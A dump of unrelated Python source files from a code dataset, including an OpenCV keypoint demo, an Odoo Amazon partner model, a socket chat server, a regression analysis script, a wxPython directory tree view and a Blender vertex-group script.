+{"seq_id":"626692394","text":"import os\n\nimport cv2\nimport numpy as np\n\npath = os.getcwd() + os.sep\n# path += '../db_aulas/Imagens/obama.jpeg'\npath += '../db_images/jpeg/captcha.jpeg'\n# path += '../db_images/png/captcha.png'\n\nimg = cv2.imread(path)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\ndetector = cv2.FastFeatureDetector_create()\nkps = detector.detect(gray, None)\n\nimg2 = cv2.drawKeypoints(img, kps, None, color=(255,0,0))\n\ncv2.imshow(\"image\", np.hstack([img, img2]))\ncv2.waitKey(0)\n","sub_path":"aulas/vision/aula_11/fast_detecter_pontos.py","file_name":"fast_detecter_pontos.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"419078265","text":"# -*- coding: utf-8 -*-pack\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nfrom odoo import api, models, fields\nfrom odoo.addons.iap.tools import iap_tools\nfrom ..endpoint import DEFAULT_ENDPOINT\n\n\nclass ResPartner(models.Model):\n \"\"\"\n Inherited for VAT configuration in partner of Warehouse.\n \"\"\"\n _inherit = \"res.partner\"\n\n is_amz_customer = fields.Boolean(\"Is Amazon Customer?\")\n\n @api.model\n def _search(self, args, offset=0, limit=None, order=None, count=False, access_rights_uid=None):\n if not self.env.context.get('is_amazon_partner', False):\n args = [('is_amz_customer', '=', False)] + list(args)\n return super(ResPartner, self)._search(args, offset, limit, order, count, access_rights_uid)\n\n @api.onchange(\"country_id\")\n def _onchange_country_id(self):\n \"\"\"\n Inherited for updating the VAT number of the partner as per the VAT configuration.\n @author: Maulik Barad on Date 13-Jan-2020.\n \"\"\"\n if self.country_id:\n warehouse_ids = self.env[\"stock.warehouse\"].search_read(\\\n [(\"partner_id\", \"=\", self._origin.id)],\n [\"id\", \"company_id\"])\n if warehouse_ids:\n vat_config = self.env[\"vat.config.ept\"].search(\\\n [(\"company_id\", \"=\", warehouse_ids[0].get(\"company_id\")[0])])\n vat_config_line = vat_config.vat_config_line_ids.filtered(\\\n lambda x: x.country_id == self.country_id)\n if vat_config_line:\n self.write({\"vat\": vat_config_line.vat})\n return super(ResPartner, self)._onchange_country_id()\n\n @api.model\n def create(self, vals):\n if vals.get('is_amz_customer'):\n vals.update({'allow_search_fiscal_based_on_origin_warehouse': True})\n return super(ResPartner, self).create(vals)\n\n def auto_delete_customer_pii_details(self):\n \"\"\"\n Auto Archive Customer's PII Details after 30 days of Import as per Amazon MWS Policies.\n :return:\n \"\"\"\n if not self.env['amazon.seller.ept'].search([]):\n return True\n account = self.env['iap.account'].search([('service_name', '=', 'amazon_ept')])\n dbuuid = self.env['ir.config_parameter'].sudo().get_param('database.uuid')\n kwargs = {\n 'app_name': 'amazon_ept',\n 'account_token': account.account_token,\n 'dbuuid': dbuuid,\n 'updated_records': 'Scheduler for delete PII data has been started.'\n }\n iap_tools.iap_jsonrpc(DEFAULT_ENDPOINT + '/delete_pii', params=kwargs, timeout=1000)\n query = \"\"\"update res_partner set name='Amazon',commercial_company_name='Amazon', \n display_name='Amazon', \n street=NULL,street2=NULL,email=NULL,city=NULL,state_id=NULL,country_id=NULL,\n zip=Null,phone=NULL,mobile=NULL\n from\n (select r1.id as partner_id,r2.id as partner_invoice_id,r3.id as \n partner_shipping_id from sale_order\n inner join res_partner r1 on r1.id=sale_order.partner_id\n inner join res_partner r2 on r2.id=sale_order.partner_invoice_id\n inner join res_partner r3 on r3.id=sale_order.partner_shipping_id\n where amz_instance_id is not null and sale_order.create_date<=current_date-30)T\n where res_partner.id in \n (T.partner_id,T.partner_invoice_id,T.partner_shipping_id)\n \"\"\"\n self.env.cr.execute(query)\n\n if self.env.cr.rowcount:\n kwargs.update({'updated_records': 'Archived %d customers' % self.env.cr.rowcount})\n iap_tools.iap_jsonrpc(DEFAULT_ENDPOINT + '/delete_pii', params=kwargs, timeout=1000)\n return True\n","sub_path":"amazon_ept/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"402098672","text":"import os\nimport collections\nimport json\n\n\ndef update(d, u):\n for k, v in u.items():\n if isinstance(v, collections.Mapping):\n d[k] = update(d.get(k, {}), v)\n else:\n d[k] = v\n return d\n\n\ndef update_from_path(d, u, path):\n if len(path) == 1:\n d[path[0]] = u[path[0]]\n return d\n d[path[0]] = update_from_path(d.get(path[0], {}), u[path[0]], path[1:])\n return d\n\n\ndef update_config_from_state(c, logger):\n if 'state' not in c or 'file' not in c['state']:\n raise ValueError('No state listed in config')\n if os.path.exists(c[\"state\"][\"file\"]):\n with open(c[\"state\"][\"file\"], \"r\") as f:\n state = json.load(f)\n c = update(c, state)\n else:\n logger.info(\"State storage file doesn't exist, initializing with empty state!\")\n return c\n\n\ndef update_state(config, logger):\n if 'state' not in config or 'file' not in config['state']:\n raise ValueError('No state listed in config')\n if len(config[\"state\"][\"file\"]) < 1:\n logger.info(\"State storage disabled in config (state file empty)! Skipping update..\")\n return\n state = {}\n for field_path in config[\"state\"][\"fields\"]:\n field_path_list = field_path.split(\":\")\n update_from_path(state, config, field_path_list)\n try:\n with open(config[\"state\"][\"file\"], \"w\") as f:\n json.dump(state, f, indent=2)\n except Exception as e:\n logger.warning(\"Failed to save state file, because: {}\".format(str(e)))\n","sub_path":"utils/src/python/ConfigUtils.py","file_name":"ConfigUtils.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"273374653","text":"#! /usr/bin/python2\n\nfrom jinja2 import Template, Environment, FileSystemLoader\nfrom os import listdir\n\nmanglers = {\n '.hs': \"Hs\",\n '.py': \"Py\",\n '.ou': \"Out\",\n}\n\ndef mangle(xs):\n def _mangle(xs, ms):\n if not ms:\n return xs\n m = ms.pop()\n return _mangle(xs.replace(*m), ms)\n return _mangle(xs, manglers.items())\n\nbpath = \"./examples/\"\nxs = listdir(bpath)\nxs = [x for x in xs if x[-3:] in manglers.keys()]\nxs = [(mangle(x), open(bpath + x).read().strip()) for x in xs]\n\nopen(\"./index.html\", \"w\").write(\n Environment(loader = FileSystemLoader('./')).\\\n get_template(\"./index.html.jinja\").\\\n render(**dict(xs)).\\\n encode(\"utf-8\")\n)\n","sub_path":"make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"117180179","text":"\"\"\"Variable selection using ridge regression\"\"\"\nimport pickle\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import mean_absolute_error\n\nfrom bld.project_paths import project_paths_join as ppj\nfrom src.model_code.polynomialregression import PolynomialRegression\nfrom src.model_code.ridgeregression import RidgeRegression\nfrom src.utilities.utilities import load_testing_data\nfrom src.utilities.utilities import load_training_data\n\n\ndef is_interaction(coef_name):\n return \":\" in coef_name\n\n\ndef is_squared(coef_name):\n return coef_name.endswith(\"^2\")\n\n\nif __name__ == \"__main__\":\n # data used for ridge regression (low sample size to induce regularization)\n Xridge, yridge = load_training_data(nobs=200)\n # data used for polynomial model fitting on subset of variables\n Xpol, ypol = load_training_data(nobs=5000)\n # data used to estimate the mean absolute error on test set\n Xtest, ytest = load_testing_data(nobs=5000)\n\n rr = RidgeRegression()\n pr = PolynomialRegression()\n\n # ridge regression, variable regularization\n rr = rr.fit(Xridge, yridge, degree=1)\n\n coef = rr.coefficients.values.reshape(-1)\n\n thresholds = np.linspace(0, 0.05, num=500)\n\n # find parameters which are zero given a threshold\n is_zero = []\n for thresh in thresholds:\n zero = np.where(np.abs(coef) < thresh)[0]\n is_zero.append(zero)\n\n # extract parameter names\n is_zero_named = [rr.coefficients.index[index].to_list() for index in is_zero]\n\n is_zero_squared = [[e for e in x if is_squared(e)] for x in is_zero_named]\n is_zero_interaction = [[e for e in x if is_interaction(e)] for x in is_zero_named]\n is_zero_linear = [\n [e for e in x if not is_interaction(e) and not is_squared(e)]\n for x in is_zero_named\n ]\n\n # compute test mae using polynomial model and store in data frame\n mae = []\n for drop in is_zero_named:\n XX = Xpol.drop(drop, axis=1)\n XXtest = Xtest.drop(drop, axis=1)\n pr = pr.fit(XX, ypol, degree=2, fit_intercept=True)\n ypred = pr.predict(XXtest)\n mae.append(mean_absolute_error(ytest, ypred))\n\n df = pd.DataFrame(zip(mae, thresholds), columns=[\"mae\", \"thresholds\"])\n\n # compute when the set of variables that are set to zero changes\n changes = []\n change_index = []\n for i in range(len(is_zero_linear) - 1):\n e = set(is_zero_linear[i])\n ee = set(is_zero_linear[i + 1])\n if e != ee:\n change_index.append(i + 1)\n changes.append(list(ee - e)[0])\n\n # save data\n data = {\n \"df\": df,\n \"change_index\": change_index,\n \"changes\": changes,\n \"thresholds\": thresholds,\n }\n with open(ppj(\"OUT_ANALYSIS\", \"variable_selection.pkl\"), \"wb\") as handle:\n pickle.dump(data, handle, protocol=pickle.HIGHEST_PROTOCOL)\n","sub_path":"src/analysis/variable_selection.py","file_name":"variable_selection.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"230195922","text":"import numpy as np\nimport random\nimport os\n\ncls=\"\\n\"*100\nprint(\"------------- Soma de Matrizes -------------\")\nwhile True:\n\tprint(\"Matriz A\")\n\tmA = int(input(\"Numero de linhas: \"))\n\tnA = int(input(\"Numero de colunas: \"))\n\tx=mA*nA\n\tmatA = np.arange(x).reshape(mA,nA)\n\n\tprint()\n\t\n\tprint(\"Matriz B\")\n\tmB = int(input(\"Numero de linhas: \"))\n\tnB = int(input(\"Numero de colunas: \"))\n\tx=mB*nB\n\tmatB = np.arange(x).reshape(mB,nB)\n\n\tif (mA!=mB) or (nA!=nB):\n\t\tos.system('cls' if os.name == 'nt' else 'clear')\n\t\tprint(\"Impossivel realizar a soma, numero de linhas ou de colunas diferentes entre as matrizes A e B\")\n\telse:\n\t\tbreak\n\nmatC = np.arange(x).reshape(mB,nB)\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tmatA[i][j] = random.randint(0,9)\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tmatB[i][j] = random.randint(0,9)\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tmatC[i][j] = matA[i][j] + matB[i][j]\nprint()\n\nespaco = ' '*nA\n\nprint(\"Matriz A\",espaco, end='\t\t')\nprint(\"Matriz B\",espaco, end='\t\t')\nprint(\"Matriz C\")\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tprint(matA[i][j], end=\" \")\n\tprint(\"\t\t\t\", end='')\n\tfor j in range(nA):\n\t\tprint(matB[i][j], end=\" \")\n\tprint(\"\t\t\t\", end='')\n\tfor j in range(nA):\n\t\tprint(matC[i][j], end=\" \")\n\tprint()\n","sub_path":"1e.py","file_name":"1e.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"52571614","text":"# protest.py\n# by aaron montoya-moraga\n# march 2017\n\n# to distribute, on terminal do\n# python setup.py sdist\n\n# from distutils.core import setup\n\nfrom setuptools import *\nfrom codecs import open\nfrom os import path\n\n\n# taken from https://tom-christie.github.io/articles/pypi/\nhere = path.abspath(path.dirname(__file__))\n\n# taken from https://tom-christie.github.io/articles/pypi/\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\n\nsetup(\n name='protest',\n version='0.5.11',\n url='https://github.com/montoyamoraga/protestpy',\n author='aaron montoya-moraga',\n description='automatic generation of protesting material',\n long_description=long_description,\n license='MIT',\n packages= find_packages(exclude=['contrib', 'docs', 'tests*']),\n install_requires=['Pillow', 'videogrep', 'selenium<3.0.0', 'youtube_dl', 'chromedriver'],\n package_data={'protest': ['*.ttf']}\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"579312729","text":"import Globals\r\nimport wx\r\nimport PlatformMethods\r\n\r\nclass DirectoryTreeView:\r\n def __init__(self, parentWin, treeDirList):\r\n self.parentWindow = parentWin\r\n self.treeDirList = treeDirList\r\n # Create an image list\r\n dirIL = wx.ImageList(16,16, True)\r\n \r\n # Get some standard images from the art provider and add them\r\n # to the image list\r\n self.fldridx = dirIL.Add(\r\n wx.ArtProvider.GetBitmap(wx.ART_FOLDER, \r\n wx.ART_OTHER, (16,16)))\r\n \r\n self.fldropenidx = dirIL.Add(\r\n wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN, \r\n wx.ART_OTHER, (16,16)))\r\n #Give the tree the image list\r\n self.treeDirList.AssignImageList(dirIL)\r\n #self.SetTreeButtons()\r\n self.UpdateDirectoryList()\r\n \r\n \r\n def UpdateDirectoryList(self):\r\n if len(Globals.DirectoryList) == 0:\r\n dirSet = set()\r\n for file in Globals.FileInfoList:\r\n dirSet.add(file.DirectoryPath)\r\n Globals.DirectoryList = list(dirSet)\r\n \r\n \r\n def SetTreeButtons(self):\r\n\r\n bitmap_plus = PlatformMethods.ConvertFilePath(\"Images/Bitmaps/plus4.ico\")\r\n bitmap_minus = PlatformMethods.ConvertFilePath(\"Images/Bitmaps/minus4.ico\")\r\n \r\n bitmap = wx.Bitmap(bitmap_plus, wx.BITMAP_TYPE_ICO)\r\n width = bitmap.GetWidth()\r\n \r\n il = wx.ImageList(width, width)\r\n \r\n il.Add(wx.Bitmap(bitmap_plus, wx.BITMAP_TYPE_ICO))\r\n #il.Add(wx.Bitmap(bitmap_plus, wx.BITMAP_TYPE_ICO))\r\n il.Add(wx.Bitmap(bitmap_minus, wx.BITMAP_TYPE_ICO))\r\n #il.Add(wx.Bitmap(bitmap_minus, wx.BITMAP_TYPE_ICO))\r\n\r\n self.buttonsIL = il \r\n #self.treeDirList.SetButtonsImageList(il)\r\n self.treeDirList.AssignButtonsImageList(il)\r\n \r\n def GetParentItem(self, parentName):\r\n parentItem = self.treeDirList.GetFirstChild(self.root)[0]\r\n while parentItem:\r\n if self.GetItemText(parentItem) == parentName:\r\n return parentItem\r\n parentItem = self.treeDirList.GetNextSibling(parentItem)\r\n return parentItem\r\n \r\n \r\n def AddDirectoryTreeNode(self, dirPath):\r\n dirList = dirPath.split(PlatformMethods.GetDirSeparator())\r\n #print dirList\r\n parentItem = self.root\r\n childrenDirList = dirList[1:]\r\n for dirName in dirList:\r\n if not dirName:\r\n continue\r\n #always start from directories in the drive e.g. C:\\NMT\\Research\\AJAX\r\n #dirName = dirList[i]\r\n siblingItem = self.GetSiblingItem(parentItem, dirName)\r\n #no directory with that name found in this level, so add it\r\n if not siblingItem:\r\n if parentItem == self.root:\r\n #add drive and image\r\n siblingItem = self.treeDirList.AppendItem(parentItem, dirName)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldridx, wx.TreeItemIcon_Normal)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldropenidx,\r\n wx.TreeItemIcon_Expanded)\r\n else:\r\n siblingItem = self.treeDirList.AppendItem(parentItem, dirName)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldridx, wx.TreeItemIcon_Normal)\r\n self.treeDirList.SetItemImage(siblingItem, self.fldropenidx,\r\n wx.TreeItemIcon_Expanded)\r\n self.AddSubDirectories(siblingItem, childrenDirList)\r\n break\r\n else:\r\n childrenDirList = childrenDirList[1:]\r\n parentItem = siblingItem\r\n \r\n self.treeDirList.SortChildren(parentItem)\r\n \r\n \r\n #dir List without drive\r\n def AddSubDirectories(self, parentItem, childrenDirList):\r\n for dirName in childrenDirList:\r\n #Insert new node as parent Item\r\n parentItem = self.treeDirList.AppendItem(parentItem, dirName)\r\n self.treeDirList.SetItemImage(parentItem, self.fldridx, wx.TreeItemIcon_Normal)\r\n self.treeDirList.SetItemImage(parentItem, self.fldropenidx,\r\n wx.TreeItemIcon_Expanded)\r\n \r\n \r\n def GetSiblingItem(self, parentItem, dirName):\r\n siblingItem = self.treeDirList.GetFirstChild(parentItem)[0]\r\n while siblingItem:\r\n if self.GetTreeItemText(siblingItem) == dirName:\r\n break\r\n siblingItem = self.treeDirList.GetNextSibling(siblingItem)\r\n return siblingItem\r\n\r\n\r\n def GetDriveItem(self, driveName):\r\n rootDirItem = self.treeDirList.GetFirstChild(self.root)[0]\r\n while rootDirItem:\r\n if self.GetItemText(rootDirItem) == driveName:\r\n break\r\n parentItem = self.treeDirList.GetNextSibling(rootDirItem)\r\n return rootDirItem\r\n \r\n \r\n def AddDirectoryTreeNodes(self):\r\n self.treeDirList.DeleteAllItems()\r\n #tbd: add image for the root\r\n self.root = self.treeDirList.AddRoot(\"Folders (\" + str(Globals.CurrentProject.TotalDirectories) + \")\")\r\n fullDirPath = Globals.DirectoryList[0]\r\n fullPathList = fullDirPath.split(PlatformMethods.GetDirSeparator())\r\n \r\n for dirPath in Globals.DirectoryList:\r\n self.AddDirectoryTreeNode(dirPath)\r\n \r\n self.treeDirList.SortChildren(self.root)\r\n self.treeDirList.Expand(self.root)\r\n return self.root\r\n \r\n \r\n def GetTreeItemText(self, item):\r\n if item:\r\n return self.treeDirList.GetItemText(item)\r\n else:\r\n return \"\"","sub_path":"DirectoryViewStyle.py","file_name":"DirectoryViewStyle.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"116681642","text":"#coding=utf-8\nfrom oscar.apps.catalogue.admin import * # noqa\nfrom .models import SearchFilter,ProductAttribute,ProductGroup\n\nadmin.site.unregister(ProductAttribute,)\n\nclass SearchFilterUserMoneyChangeAdmin(admin.ModelAdmin):\n list_display = ('class_id','attribute', 'search_value', 'search_order', 'chose')\n \n \n def class_id(self,obj):\n return obj.attribute.product_class.name\n class_id.short_description= u'商品类'\n \n #过滤搜索属性\n def formfield_for_foreignkey(self, db_field, request=None, **kwargs):\n if db_field.name == 'attribute':\n kwargs['queryset'] = ProductAttribute.objects.filter(search_filter=True)\n\n return super(SearchFilterUserMoneyChangeAdmin,self).formfield_for_foreignkey(db_field, request=request, **kwargs)\n\nclass SearchFilterInline(admin.TabularInline):\n model = SearchFilter\n \nclass ProductAttributeAdmin(ProductAttributeAdmin):\n list_display = ('name', 'code', 'product_class', 'type')\n prepopulated_fields = {\"code\": (\"name\", )}\n inlines=[SearchFilterInline,]\n \nclass ProductGroupAdmin(admin.ModelAdmin):\n list_display = ('name',)\n filter_horizontal = ('attr',)\n \n\nadmin.site.register(SearchFilter,SearchFilterUserMoneyChangeAdmin)\nadmin.site.register(ProductAttribute, ProductAttributeAdmin)\nadmin.site.register(ProductGroup, ProductGroupAdmin)\n","sub_path":"stars/apps/catalogue/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"331016124","text":"\"\"\"Utilities for using the OpenCL kernels.\"\"\"\nimport numpy as np\nimport pyopencl as cl\n\n\nDOUBLE_FP_SUPPORT = (\n cl.device_fp_config.DENORM | cl.device_fp_config.FMA |\n cl.device_fp_config.INF_NAN | cl.device_fp_config.ROUND_TO_INF |\n cl.device_fp_config.ROUND_TO_NEAREST |\n cl.device_fp_config.ROUND_TO_ZERO\n )\n\n\ndef double_fp_support(device):\n \"\"\"\n Test whether a context supports double floating-point precission.\n\n :arg device: The OpenCL context to test.\n :type device: :class:`pyopencl._cl.Device`\n\n :returns: `True` if the device supports double floating-point precision,\n `False` otherwise.\n :rtype: `bool`\n \"\"\"\n return device.get_info(cl.device_info.DOUBLE_FP_CONFIG) & DOUBLE_FP_SUPPORT\n\n\ndef get_context():\n \"\"\"\n Find an appropriate OpenCL context.\n\n This function looks for a device with support for double\n floating-point precision and prefers GPU devices.\n\n :returns: A context with a single suitable device, or `None` is no suitable\n device is found.\n :rtype: :class:`pyopencl._cl.Context` or `NoneType`\n \"\"\"\n for platform in cl.get_platforms():\n for device_type in [cl.device_type.GPU, cl.device_type.ALL]:\n for device in platform.get_devices(device_type):\n if double_fp_support(device):\n return cl.Context([device])\n return None\n\n\ndef pad(array, group_size, axis=0):\n \"\"\"\n Pad an array with zeros so that it is a multiple of the group size.\n\n :arg array: Array to pad.\n :type array: :class:`numpy.ndarray`\n :arg int group_size: OpenCL group size.\n :arg int axis: The axis to pad with zeros. Default is 0.\n\n :returns: `array` padded with an appropriate number of zeros.\n :rtype: :class:`numpy.ndarray`\n \"\"\"\n array_size = array.shape[axis]\n remainder = array_size % group_size\n if remainder == 0:\n return array\n else:\n padding = group_size - array_size % group_size\n padding_shape = list(array.shape)\n padding_shape[axis] = padding\n return np.concatenate(\n (array, np.zeros(padding_shape, dtype=array.dtype)), axis=axis\n )\n","sub_path":"peridynamics/cl/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"506784711","text":"# server.py\n \nimport sys\nimport socket\nimport select\nimport re\nfrom utils import *\n\nclass Server:\n \n socket_list = []\n channels = []\n client_channel_map = {}\n host = \"localhost\"\n \n def __init__(self, port):\n self.host = socket.gethostbyname(self.host)\n self.port = int(port)\n \n # initialize the server socket with given host and port\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.server_socket.bind((self.host, self.port))\n \n # make it listen to 5 connections\n self.server_socket.listen(5)\n \n # add server socket to the list of readable connections\n self.socket_list.append(self.server_socket)\n \n def start_chat(self):\n while True:\n # get the list of sockets ready to be read through select.select\n ready_to_read, ready_to_write, in_error = select.select(self.socket_list, [], [])\n \n for socket in ready_to_read:\n if socket == self.server_socket:\n self.connection_request()\n \n # message is from an existing client connection\n else:\n try:\n message = socket.recv(MESSAGE_LENGTH)\n client_address = str(socket.getpeername())\n client_name = message.split(\" \", 1)[0].replace(\"[\", \"\").replace(\"]\", \"\")\n\n if message:\n # message is a control message\n if re.match(r'/', message.split(\" \", 1)[1].rstrip()):\n self.control_message(message, client_name, client_address, socket)\n \n # if not an ordinary message\n else:\n if self.client_channel_map.get(client_address):\n if \"Disconnect!\" in message.rstrip():\n self.broadcast(socket, SERVER_CLIENT_LEFT_CHANNEL.format(client_name) + \"\\n \")\n self.socket_list.remove(socket)\n self.client_channel_map.pop(socket)\n else:\n self.broadcast(socket, message + \" \")\n else:\n self.send_to_client(socket, SERVER_CLIENT_NOT_IN_CHANNEL + \"\\n \")\n except:\n continue\n \n \n # if a new connection request is received\n # socket == self.server_socket works because client socket is binded or has \n # the same host and ip such as this client\n def connection_request(self):\n (new_client_socket, (address)) = self.server_socket.accept()\n self.socket_list.append(new_client_socket)\n self.send_to_client(new_client_socket, \"Welcome to the chat app! Your address is \" + str(address) + \".\\n \")\n \n # handles control messages \n def control_message(self, message, name, address, socket):\n # send channel list to client\n if re.match(r'/list$', message.split(\" \", 1)[1].rstrip()):\n for channel in self.channels:\n self.send_to_client(socket, channel + \"\\n \")\n # client wants to create a new channel\n # elif \"/create\" in message:\n elif re.match(r'^(/create)', message.split(\" \", 1)[1].rstrip()):\n if re.match(r'/create\\s\\S+', message.split(\" \", 1)[1].rstrip()): \n channel = message.split(\"/create \")[1].rstrip()\n if channel in self.channels:\n self.send_to_client(socket, SERVER_CHANNEL_EXISTS.format(channel) + \".\\n \")\n else:\n if self.client_channel_map.get(address):\n self.broadcast(socket, SERVER_CLIENT_LEFT_CHANNEL.format(name) + \"\\n \")\n \n self.channels.append(channel)\n self.client_channel_map[address] = channel\n self.send_to_client(socket, \"You created a new channel named \" + channel + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_CREATE_REQUIRES_ARGUMENT + \".\\n \")\n # join an existing channel \n # elif \"/join\" in message:\n elif re.match(r'^(/join)', message.split(\" \", 1)[1].rstrip()):\n if re.match(r'/join\\s\\S+', message.split(\" \", 1)[1].rstrip()): \n channel = message.split(\"/join \")[1].rstrip()\n if channel in self.channels:\n if self.client_channel_map.get(address):\n self.broadcast(socket, SERVER_CLIENT_LEFT_CHANNEL.format(name) + \".\\n \")\n \n self.client_channel_map[address] = channel\n self.send_to_client(socket, \"You joined a channel named \" + channel + \".\\n \")\n self.broadcast(socket, SERVER_CLIENT_JOINED_CHANNEL.format(name) + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_NO_CHANNEL_EXISTS.format(channel) + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_JOIN_REQUIRES_ARGUMENT + \".\\n \")\n else:\n self.send_to_client(socket, SERVER_INVALID_CONTROL_MESSAGE.format(message.split(\" \", 1)[1].rstrip()) + \"\\n \")\n \n # send message to all clients \n def broadcast(self, client_socket, message):\n for socket in self.socket_list:\n # send messages only to peers\n if socket != self.server_socket and socket != client_socket:\n if self.client_channel_map[str(client_socket.getpeername())] == self.client_channel_map[str(socket.getpeername())]:\n try:\n socket.send(message)\n except:\n socket.close()\n if socket in self.socket_list:\n self.socket_list.remove(socket)\n self.client_channel_map.pop(socket)\n \n # send to a specific client\n def send_to_client(self, client_socket, message):\n try:\n client_socket.send(message)\n except:\n client_socket.close()\n if client_socket in self.socket_list:\n self.socket_list.remove(client_socket)\n self.client_channel_map.pop(client_socket)\n\nif len(sys.argv) < 3:\n server = Server(sys.argv[1])\n server.start_chat()","sub_path":"Machine Problem #1 Chat (Kuizon, Vicente)/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"499966737","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\nclass MinecraftWikiCrawler:\n\n def __init__(self):\n self.Prefix = 'https://minecraft-zh.gamepedia.com/'\n\n def Search(self, Tag):\n format_string = ''\n url = self.Prefix + Tag\n res = requests.get(url)\n content = res.content\n soup = BeautifulSoup(content, 'html.parser')\n Total = ''\n for index, data in enumerate(soup.select('#pageWrapper #bodyContent div.mw-parser-output p')):\n format_string += str(data.text)\n if data.has_attr('href'):\n format_string += str(data['href'])\n Total += format_string\n return Total\n","sub_path":"Models/MinecraftWikiCrawler.py","file_name":"MinecraftWikiCrawler.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"9057445","text":"#Name: Chris Demundo\n#Umich ID: cdemundo\n\n# Imports -- you may add others but do not need to\nimport plotly.plotly as py\nimport plotly.graph_objs as go\nimport csv\n\n#login to plot.ly required to save offline image files\npy.sign_in('cdemundo', 'UEVvPcPrIgVPn6YTRLBF')\n\n# Code here should involve creation of the bar chart as specified in instructions\n# And opening / using the CSV file you created earlier with noun data from tweets\ncsv_file_path = \"./noun_data.csv\"\n\nwith open(csv_file_path) as f:\n reader = csv.DictReader(f)\n data = [r for r in reader]\n\ndata = [go.Bar(\n x=[d[\"Noun\"] for d in data],\n y=[d[\"Number\"] for d in data]\n )]\n\nlayout = go.Layout(\n title='Analysis of Tweets',\n xaxis=dict(\n tickfont=dict(\n size=14,\n color='rgb(107, 107, 107)'\n )\n ),\n yaxis=dict(\n title='Number of Times Used',\n titlefont=dict(\n size=16,\n color='rgb(107, 107, 107)'\n ),\n tickfont=dict(\n size=14,\n color='rgb(107, 107, 107)'\n )\n )\n)\n\nfig = go.Figure(data=data, layout=layout)\n\npy.image.save_as(fig, filename='part4_viz_image.png')","sub_path":"part4.py","file_name":"part4.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"241890502","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n#bl_info = {\n# \"name\": \"Balance Vertex Groups\",\n# \"author\": \"Koilz\",\n# \"version\": (1, 1),\n# \"blender\": (2, 70, 0),\n# \"location\": \"Properties > Data > Vertex Groups > Edit Mode\",\n# \"description\": \"Balance the weight of two vertex groups\",\n# \"warning\": \"\",\n# \"wiki_url\": \"http://wiki.blender.org/index.php/Extensions:2.6/Py/Scripts/Rigging/VG_Oppose\",\n# \"category\": \"Rigging\"}\n\nimport bpy\n\nbpy.types.Scene.vgai2 = bpy.props.StringProperty(name=\"Vertex Group Index 2\", description=\"Second active index for vertex groups\", default='')\n\ndef main(context):\n\n # save vertex_group\n vg_previous = context.active_object.vertex_groups.active_index\n\n # save weight\n vg_weight_previous = context.scene.tool_settings.vertex_group_weight\n\n # assign weight\n bpy.ops.object.vertex_group_assign()\n\n # oppose vertex group\n context.active_object.vertex_groups.active_index = context.active_object.vertex_groups[context.scene.vgai2].index\n\n # oppose weight\n context.scene.tool_settings.vertex_group_weight = 1-vg_weight_previous\n\n # assign weight\n bpy.ops.object.vertex_group_assign()\n\n # restore vertex group\n context.active_object.vertex_groups.active_index = vg_previous\n\n # restore weight\n context.scene.tool_settings.vertex_group_weight = 